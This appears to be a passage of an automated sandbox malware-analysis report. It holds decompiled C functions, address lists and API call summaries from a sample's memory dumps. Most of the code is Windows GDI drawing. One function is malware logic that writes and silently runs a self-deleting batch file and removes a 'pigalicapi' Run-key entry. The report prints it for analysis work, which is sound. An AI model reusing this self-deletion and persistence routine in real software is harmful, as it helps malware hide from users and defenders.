                                                                                                                                                                                                                                                                                          								_v76.top = _t141;
                                                                                                                                                                                                                                                                                          								_v76.left = _t178;
                                                                                                                                                                                                                                                                                          								_v76.bottom = _t141 + _t155;
                                                                                                                                                                                                                                                                                          								_v76.right = _t178 + _a16;
                                                                                                                                                                                                                                                                                          								FillRect( *_t203,  &_v76, _t194);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v100 = SelectObject( *_t203, _v100);
                                                                                                                                                                                                                                                                                          							BitBlt( *_t203, _a8 + 1, _a12 + 1, _a16, _t155, _v88, 0, 0, 0xb8074a);
                                                                                                                                                                                                                                                                                          							SelectObject( *_t203, _v120);
                                                                                                                                                                                                                                                                                          							BitBlt( *_t203, _a8, _a12, _a16, _t155, _v88, 0, 0, 0xb8074a);
                                                                                                                                                                                                                                                                                          							_t200 =  *_t203;
                                                                                                                                                                                                                                                                                          							SelectObject( *_t203, _v100);
                                                                                                                                                                                                                                                                                          							_t156 = _v88;
                                                                                                                                                                                                                                                                                          							SelectObject(_t156, _v124);
                                                                                                                                                                                                                                                                                          							_t204 = _v80;
                                                                                                                                                                                                                                                                                          							SelectObject(_t204, 0);
                                                                                                                                                                                                                                                                                          							if(_v92 == 0) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_t204);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							DeleteObject(_v116);
                                                                                                                                                                                                                                                                                          							DeleteDC(_t156);
                                                                                                                                                                                                                                                                                          							return E001059E6(1, _t156, _v12 ^ _t208, _t200, _t204, _t207);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t205 = DeleteDC;
                                                                                                                                                                                                                                                                                          							if(_v92 == _t98) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_v80);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							DeleteDC(_t206);
                                                                                                                                                                                                                                                                                          							return E001059E6(0, _t155, _v12 ^ _t208, _t186, _t205, _t206);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_v92 == 0) {
                                                                                                                                                                                                                                                                                          							DeleteDC(_v80);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                                          0x00103960
                                                                                                                                                                                                                                                                                          0x00103969
                                                                                                                                                                                                                                                                                          0x00103970
                                                                                                                                                                                                                                                                                          0x00103973
                                                                                                                                                                                                                                                                                          0x00103977
                                                                                                                                                                                                                                                                                          0x0010397c
                                                                                                                                                                                                                                                                                          0x0010397f
                                                                                                                                                                                                                                                                                          0x00103985
                                                                                                                                                                                                                                                                                          0x00103988
                                                                                                                                                                                                                                                                                          0x0010398b
                                                                                                                                                                                                                                                                                          0x0010398e
                                                                                                                                                                                                                                                                                          0x00103993
                                                                                                                                                                                                                                                                                          0x00103995
                                                                                                                                                                                                                                                                                          0x00103998
                                                                                                                                                                                                                                                                                          0x00103998
                                                                                                                                                                                                                                                                                          0x0010399e
                                                                                                                                                                                                                                                                                          0x001039a3
                                                                                                                                                                                                                                                                                          0x001039c8
                                                                                                                                                                                                                                                                                          0x001039da
                                                                                                                                                                                                                                                                                          0x001039a5
                                                                                                                                                                                                                                                                                          0x001039ae
                                                                                                                                                                                                                                                                                          0x001039b2
                                                                                                                                                                                                                                                                                          0x001039b7
                                                                                                                                                                                                                                                                                          0x001039e9
                                                                                                                                                                                                                                                                                          0x001039ed
                                                                                                                                                                                                                                                                                          0x001039f2
                                                                                                                                                                                                                                                                                          0x001039f9
                                                                                                                                                                                                                                                                                          0x001039fc
                                                                                                                                                                                                                                                                                          0x00103a03
                                                                                                                                                                                                                                                                                          0x00103a06
                                                                                                                                                                                                                                                                                          0x00103a09
                                                                                                                                                                                                                                                                                          0x00103a0c
                                                                                                                                                                                                                                                                                          0x00103a0f
                                                                                                                                                                                                                                                                                          0x00103a12
                                                                                                                                                                                                                                                                                          0x00103a15
                                                                                                                                                                                                                                                                                          0x00103a18
                                                                                                                                                                                                                                                                                          0x00103a1f
                                                                                                                                                                                                                                                                                          0x00103a25
                                                                                                                                                                                                                                                                                          0x00103a2a
                                                                                                                                                                                                                                                                                          0x00103a57
                                                                                                                                                                                                                                                                                          0x00103a62
                                                                                                                                                                                                                                                                                          0x00103a6e
                                                                                                                                                                                                                                                                                          0x00103a82
                                                                                                                                                                                                                                                                                          0x00103a91
                                                                                                                                                                                                                                                                                          0x00103aa4
                                                                                                                                                                                                                                                                                          0x00103aac
                                                                                                                                                                                                                                                                                          0x00103acd
                                                                                                                                                                                                                                                                                          0x00103ad0
                                                                                                                                                                                                                                                                                          0x00103adc
                                                                                                                                                                                                                                                                                          0x00103af9
                                                                                                                                                                                                                                                                                          0x00103b16
                                                                                                                                                                                                                                                                                          0x00103b33
                                                                                                                                                                                                                                                                                          0x00103b3e
                                                                                                                                                                                                                                                                                          0x00103b48
                                                                                                                                                                                                                                                                                          0x00103b4a
                                                                                                                                                                                                                                                                                          0x00103b4f
                                                                                                                                                                                                                                                                                          0x00103b52
                                                                                                                                                                                                                                                                                          0x00103b52
                                                                                                                                                                                                                                                                                          0x00103b58
                                                                                                                                                                                                                                                                                          0x00103b5d
                                                                                                                                                                                                                                                                                          0x00103b60
                                                                                                                                                                                                                                                                                          0x00103b60
                                                                                                                                                                                                                                                                                          0x00103b66
                                                                                                                                                                                                                                                                                          0x00103b6b
                                                                                                                                                                                                                                                                                          0x00103b6e
                                                                                                                                                                                                                                                                                          0x00103b6e
                                                                                                                                                                                                                                                                                          0x00103b76
                                                                                                                                                                                                                                                                                          0x00103b79
                                                                                                                                                                                                                                                                                          0x00103b79
                                                                                                                                                                                                                                                                                          0x00103b7f
                                                                                                                                                                                                                                                                                          0x00103b82
                                                                                                                                                                                                                                                                                          0x00103b87
                                                                                                                                                                                                                                                                                          0x00103b89
                                                                                                                                                                                                                                                                                          0x00103b8c
                                                                                                                                                                                                                                                                                          0x00103b8f
                                                                                                                                                                                                                                                                                          0x00103b92
                                                                                                                                                                                                                                                                                          0x00103b9a
                                                                                                                                                                                                                                                                                          0x00103ba1
                                                                                                                                                                                                                                                                                          0x00103ba8
                                                                                                                                                                                                                                                                                          0x00103ba8
                                                                                                                                                                                                                                                                                          0x00103bcb
                                                                                                                                                                                                                                                                                          0x00103bd9
                                                                                                                                                                                                                                                                                          0x00103be6
                                                                                                                                                                                                                                                                                          0x00103c05
                                                                                                                                                                                                                                                                                          0x00103c0e
                                                                                                                                                                                                                                                                                          0x00103c12
                                                                                                                                                                                                                                                                                          0x00103c17
                                                                                                                                                                                                                                                                                          0x00103c1c
                                                                                                                                                                                                                                                                                          0x00103c1e
                                                                                                                                                                                                                                                                                          0x00103c24
                                                                                                                                                                                                                                                                                          0x00103c2a
                                                                                                                                                                                                                                                                                          0x00103c2d
                                                                                                                                                                                                                                                                                          0x00103c2d
                                                                                                                                                                                                                                                                                          0x00103c37
                                                                                                                                                                                                                                                                                          0x00103c3e
                                                                                                                                                                                                                                                                                          0x00103c59
                                                                                                                                                                                                                                                                                          0x00103a2c
                                                                                                                                                                                                                                                                                          0x00103a2c
                                                                                                                                                                                                                                                                                          0x00103a35
                                                                                                                                                                                                                                                                                          0x00103a3b
                                                                                                                                                                                                                                                                                          0x00103a3b
                                                                                                                                                                                                                                                                                          0x00103a3e
                                                                                                                                                                                                                                                                                          0x00103a52
                                                                                                                                                                                                                                                                                          0x00103a52
                                                                                                                                                                                                                                                                                          0x001039b9
                                                                                                                                                                                                                                                                                          0x001039bc
                                                                                                                                                                                                                                                                                          0x001039c2
                                                                                                                                                                                                                                                                                          0x001039c2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001039bc
                                                                                                                                                                                                                                                                                          0x001039b7

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00103998
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 001039A8
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 001039C2
                                                                                                                                                                                                                                                                                          • CreateDIBSection.GDI32(00000000,00102057,00000000,?,00000000,00000000), ref: 00103A1F
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00103A3B
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00103A3E
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00103A5D
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32 ref: 00103A65
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00103A73
                                                                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 00103A85
                                                                                                                                                                                                                                                                                          • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 00103A99
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00103AA7
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00103AB4
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00CC0020), ref: 00103AD0
                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(00000000,00808080), ref: 00103ADC
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00103AF9
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00660046), ref: 00103B16
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00103B33
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00103B3E
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00103B48
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00103B52
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00103B60
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00103B6E
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00103B79
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 00103BA8
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00103BB5
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,01000000,00000001,00000000,?,?,00000000,00000000,00B8074A), ref: 00103BD9
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00103BE6
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00FFFFFF,00000000,00000000,?,?,00000000,00000000,00B8074A), ref: 00103C05
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00103C12
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00103C1C
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00103C24
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00103C2D
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00103C37
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00103C3E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Object$DeleteSelect$Create$Compatible$Bitmap$ColorFillRectSection
                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                          • API String ID: 1654306582-3887548279
                                                                                                                                                                                                                                                                                          • Opcode ID: 2b5eec4d158bf39678a48da1d62a98b4bd16081765a52d48f726ffa37c66de58
                                                                                                                                                                                                                                                                                          • Instruction ID: c138489bb2b7439e28b781540541f2714d0ddf7ef1485d34a47c492cc532504a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b5eec4d158bf39678a48da1d62a98b4bd16081765a52d48f726ffa37c66de58
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB1A9B5E00209AFDB14DFA5DD85FAEB7B9FB4C740F20811AF915E7280D7B4A9418B60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                                                                                                          			E040074A0() {
                                                                                                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                                                                                                          				CHAR* _v528;
                                                                                                                                                                                                                                                                                          				void* _v532;
                                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                                          				void* _v540;
                                                                                                                                                                                                                                                                                          				char _v1060;
                                                                                                                                                                                                                                                                                          				char _v1580;
                                                                                                                                                                                                                                                                                          				char _v2364;
                                                                                                                                                                                                                                                                                          				long _v2368;
                                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                                          				long _v2388;
                                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                                          				void* _t124;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				E04007D20(E04007D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                                          				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                                          				 *0x4014370 = 1;
                                                                                                                                                                                                                                                                                          				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                          				if(( *0x4014362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v2368 = 0x207;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                                          				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                                          				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                                          				if( *0x401436c != 0) {
                                                                                                                                                                                                                                                                                          					_t86 =  *0x401436c; // 0x2e4
                                                                                                                                                                                                                                                                                          					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                          				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                                          					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					E04005E30(1);
                                                                                                                                                                                                                                                                                          					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                                          				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                                          				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                                          				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                          				_v540 = _t71;
                                                                                                                                                                                                                                                                                          				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_v2388 = 0;
                                                                                                                                                                                                                                                                                          					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                                          					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                                          					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                                          					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                                          					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                                          						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t71;
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x040074cd
                                                                                                                                                                                                                                                                                          0x040074d2
                                                                                                                                                                                                                                                                                          0x040074d5
                                                                                                                                                                                                                                                                                          0x040074e4
                                                                                                                                                                                                                                                                                          0x040074f3
                                                                                                                                                                                                                                                                                          0x0400750b
                                                                                                                                                                                                                                                                                          0x0400751e
                                                                                                                                                                                                                                                                                          0x04007547
                                                                                                                                                                                                                                                                                          0x04007520
                                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                                          0x04007559
                                                                                                                                                                                                                                                                                          0x0400756b
                                                                                                                                                                                                                                                                                          0x0400757d
                                                                                                                                                                                                                                                                                          0x040074f5
                                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                                          0x0400758f
                                                                                                                                                                                                                                                                                          0x040075b4
                                                                                                                                                                                                                                                                                          0x040075ba
                                                                                                                                                                                                                                                                                          0x040075c4
                                                                                                                                                                                                                                                                                          0x040075c8
                                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                                          0x040075d4
                                                                                                                                                                                                                                                                                          0x040075de
                                                                                                                                                                                                                                                                                          0x040075f1
                                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                                          0x040075fd
                                                                                                                                                                                                                                                                                          0x04007628
                                                                                                                                                                                                                                                                                          0x04007636
                                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                                          0x04007652
                                                                                                                                                                                                                                                                                          0x04007656
                                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                                          0x0400766f
                                                                                                                                                                                                                                                                                          0x04007698
                                                                                                                                                                                                                                                                                          0x040076aa
                                                                                                                                                                                                                                                                                          0x040076c6
                                                                                                                                                                                                                                                                                          0x040076cc
                                                                                                                                                                                                                                                                                          0x040076d9
                                                                                                                                                                                                                                                                                          0x040076df
                                                                                                                                                                                                                                                                                          0x0400770e
                                                                                                                                                                                                                                                                                          0x0400773f
                                                                                                                                                                                                                                                                                          0x04007747
                                                                                                                                                                                                                                                                                          0x0400775a
                                                                                                                                                                                                                                                                                          0x04007762
                                                                                                                                                                                                                                                                                          0x04007794
                                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                                          0x040077ae

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 040074E4
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 04007503
                                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0400752E
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C650), ref: 04007559
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,pigalicapi), ref: 0400756B
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 0400757D
                                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 0400758F
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040075B4
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(000002E4,00000001), ref: 040075CE
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 04007620
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 04007636
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007643
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0400766F
                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0400767C
                                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 04007698
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.bat), ref: 040076AA
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 040076C6
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000000), ref: 040076F9
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 0400770E
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400771B
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0400778C
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400779D
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040077A5
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
                                                                                                                                                                                                                                                                                          • API String ID: 3221898725-336785456
                                                                                                                                                                                                                                                                                          • Opcode ID: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                                          • Instruction ID: 33d1a80e31bd16fda39fb1d5e61c33b6d2d8e7faa3bd40571536c86a9d597677
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 277134B1A44318ABF7649F60DC49FEA7778EB44705F448698B209B60C1DBBCAA84CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E00101DE0(intOrPtr __ecx, void* __edx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v40;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v56;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v72;
                                                                                                                                                                                                                                                                                          				signed int _v76;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v80;
                                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                                          				int _v88;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _v92;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _v96;
                                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                                                                                                                                          				long _v108;
                                                                                                                                                                                                                                                                                          				long _v112;
                                                                                                                                                                                                                                                                                          				char _v116;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v164;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t167;
                                                                                                                                                                                                                                                                                          				intOrPtr _t169;
                                                                                                                                                                                                                                                                                          				signed int _t170;
                                                                                                                                                                                                                                                                                          				long _t173;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t182;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t185;
                                                                                                                                                                                                                                                                                          				signed int _t190;
                                                                                                                                                                                                                                                                                          				long _t193;
                                                                                                                                                                                                                                                                                          				long _t194;
                                                                                                                                                                                                                                                                                          				int _t202;
                                                                                                                                                                                                                                                                                          				void* _t205;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t227;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t228;
                                                                                                                                                                                                                                                                                          				int _t250;
                                                                                                                                                                                                                                                                                          				void* _t257;
                                                                                                                                                                                                                                                                                          				long _t258;
                                                                                                                                                                                                                                                                                          				int _t265;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t268;
                                                                                                                                                                                                                                                                                          				intOrPtr _t303;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t305;
                                                                                                                                                                                                                                                                                          				int _t311;
                                                                                                                                                                                                                                                                                          				intOrPtr _t325;
                                                                                                                                                                                                                                                                                          				intOrPtr _t326;
                                                                                                                                                                                                                                                                                          				int _t330;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t331;
                                                                                                                                                                                                                                                                                          				void* _t332;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t336;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t337;
                                                                                                                                                                                                                                                                                          				void* _t340;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t341;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t342;
                                                                                                                                                                                                                                                                                          				intOrPtr _t346;
